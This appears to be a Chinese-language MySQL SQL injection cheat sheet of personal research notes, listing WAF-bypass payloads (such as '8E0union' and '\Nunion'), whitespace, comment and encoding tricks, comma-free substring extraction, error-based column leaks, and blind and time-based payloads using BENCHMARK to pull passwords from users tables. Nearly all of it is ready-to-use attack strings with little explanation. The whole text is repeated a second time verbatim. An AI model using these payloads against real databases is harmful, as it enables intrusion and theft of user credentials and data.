1 直接上语法
2 select * from users where id =8E0union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
3 select * from users where id = 8.0 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
4 select * from users where id =\Nunion select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点数指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id =.1 union /* .1 */ select -. 1
9 where id =.1 union /* .1 */ select!. 1
10 where id =.1 union /* .1 */ select ~. 1
11 where id =.1 union /* .1 */ select( 1)
12 where id =.1 union /* .1 */ select`host` from mysql. user
13 where id =.1 union /* .1 */ select ' 1 '
14 where id =.1 union /* .1 */ select" 1"
15 where id =.1 union /* .1 */ select @1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号( and or),单引号,逗号",",双引号"",截断符号如:(# -- /*)
20
21 空格:
22 select * from( user);
23 select * from` user`;
24 ' and(true)like(false)union(select(pass)from(users))#
25 ' union [ all|distinct ] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non-breaking Space
32 20 Space
33
34 且与符号( and or):
35 select * from user where host = ' localhost ' && 0 = 0 limit 0, 1;
36 select * from user where host = ' localhost ' || 1 = 1 limit 0, 1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1 = 1 AND-+-+-+-+~~(( 1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!! ' 2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 ' -GBK编码 %df ' ; ' -% 2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM (( SELECT 1)a JOIN ( SELECT 2)b JOIN ( SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host '
61 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name ' User '
63 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host, User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password '
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a ' = n 'a # unicode
71 ' or 'a ' = b ' 1100001 # binary
72 ' or 'a ' = x ' 61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data, 1, 1) = unhex( 61)# unhex( 6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data, 1, 1) = lower(conv( 10, 10, 36))# ' a '
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b '
81 ' and substr(data, 1, 1) = lower(conv( 36, 10, 36))# ' z '
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ; % 00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(), 1, 1) = ' 5 '
93 AND SELECT SUBSTR(column_name, 1, 1) FROM information_schema.columns > ' A '
94 ' and substr(data,1,1) = 'a ' #
95 ' and substring(data, 1, 1) = ' a '#
96 ' and mid(data,1,1) = 'a ' #
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = ' a '#
99 lpad(data, 1, space( 1)) // lpad( ' hi ', 4, ' ? ') = ' ??hi '
100 rpad(data, 1, space( 1)) // rpad( ' hi ', 4, ' ? ') = ' hi?? '
101 left(data, 1)
102 reverse( right( reverse(data), 1))
103 insert( insert(version(), 1, 0, space( 0)), 2, 222, space( 0))
104 ● Subselect:
105 1 ' and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and ' 1
107
108 Some functions allow to search substrings:
109 ' -if(locate( 'f ' ,data),1,0)#
110 ' - if(locate( ' fo ',data), 1, 0)#
111 ' -if(locate( 'foo ' ,data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a ' FROM data)) # length will be shorter
115 length(replace(data, 'a ' , '' )) # length will be shorter
116
117 Subselect:
118 foo 'div count( select`pass` from(users) where mid(pass, 1, 1)rlike
119 lower(conv( 10, pi() * pi(), pi() * pi())) ) - ' 0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - ( IF(MID(version(), 1, 1) LIKE 5, BENCHMARK( 100000,SHA1( ' true ')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
2 select * from users where id =8E0union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
3 select * from users where id = 8.0 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
4 select * from users where id =\Nunion select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点数指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id =.1 union /* .1 */ select -. 1
9 where id =.1 union /* .1 */ select!. 1
10 where id =.1 union /* .1 */ select ~. 1
11 where id =.1 union /* .1 */ select( 1)
12 where id =.1 union /* .1 */ select`host` from mysql. user
13 where id =.1 union /* .1 */ select ' 1 '
14 where id =.1 union /* .1 */ select" 1"
15 where id =.1 union /* .1 */ select @1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号( and or),单引号,逗号",",双引号"",截断符号如:(# -- /*)
20
21 空格:
22 select * from( user);
23 select * from` user`;
24 ' and(true)like(false)union(select(pass)from(users))#
25 ' union [ all|distinct ] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non-breaking Space
32 20 Space
33
34 且与符号( and or):
35 select * from user where host = ' localhost ' && 0 = 0 limit 0, 1;
36 select * from user where host = ' localhost ' || 1 = 1 limit 0, 1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1 = 1 AND-+-+-+-+~~(( 1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!! ' 2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 ' -GBK编码 %df ' ; ' -% 2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM (( SELECT 1)a JOIN ( SELECT 2)b JOIN ( SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host '
61 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name ' User '
63 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host, User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password '
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a ' = n 'a # unicode
71 ' or 'a ' = b ' 1100001 # binary
72 ' or 'a ' = x ' 61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data, 1, 1) = unhex( 61)# unhex( 6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data, 1, 1) = lower(conv( 10, 10, 36))# ' a '
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b '
81 ' and substr(data, 1, 1) = lower(conv( 36, 10, 36))# ' z '
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ; % 00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(), 1, 1) = ' 5 '
93 AND SELECT SUBSTR(column_name, 1, 1) FROM information_schema.columns > ' A '
94 ' and substr(data,1,1) = 'a ' #
95 ' and substring(data, 1, 1) = ' a '#
96 ' and mid(data,1,1) = 'a ' #
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = ' a '#
99 lpad(data, 1, space( 1)) // lpad( ' hi ', 4, ' ? ') = ' ??hi '
100 rpad(data, 1, space( 1)) // rpad( ' hi ', 4, ' ? ') = ' hi?? '
101 left(data, 1)
102 reverse( right( reverse(data), 1))
103 insert( insert(version(), 1, 0, space( 0)), 2, 222, space( 0))
104 ● Subselect:
105 1 ' and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and ' 1
107
108 Some functions allow to search substrings:
109 ' -if(locate( 'f ' ,data),1,0)#
110 ' - if(locate( ' fo ',data), 1, 0)#
111 ' -if(locate( 'foo ' ,data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a ' FROM data)) # length will be shorter
115 length(replace(data, 'a ' , '' )) # length will be shorter
116
117 Subselect:
118 foo 'div count( select`pass` from(users) where mid(pass, 1, 1)rlike
119 lower(conv( 10, pi() * pi(), pi() * pi())) ) - ' 0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - ( IF(MID(version(), 1, 1) LIKE 5, BENCHMARK( 100000,SHA1( ' true ')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T